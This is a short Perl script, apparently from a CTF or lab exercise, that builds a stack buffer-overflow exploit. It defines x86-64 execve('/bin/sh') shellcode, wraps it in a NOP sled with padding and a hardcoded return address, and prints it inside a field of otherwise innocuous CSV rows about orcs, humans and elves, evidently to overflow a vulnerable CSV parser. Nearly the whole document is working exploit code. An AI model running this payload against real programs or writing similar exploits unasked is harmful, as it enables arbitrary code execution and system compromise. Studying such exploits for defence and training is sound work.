$buff = "\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x50\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05";
$payload = "\x90"x97 . $buff . "\x90"x168 . "\xa0\xde\xff\xff\xff\x7f";
# Address 0x7fffffffdda0


print "Orcs,Humans,Elves,Goblins,Programmers\n";
print "1,3,5,4,6\n";
print "10,23,".$payload.",12,4\n";

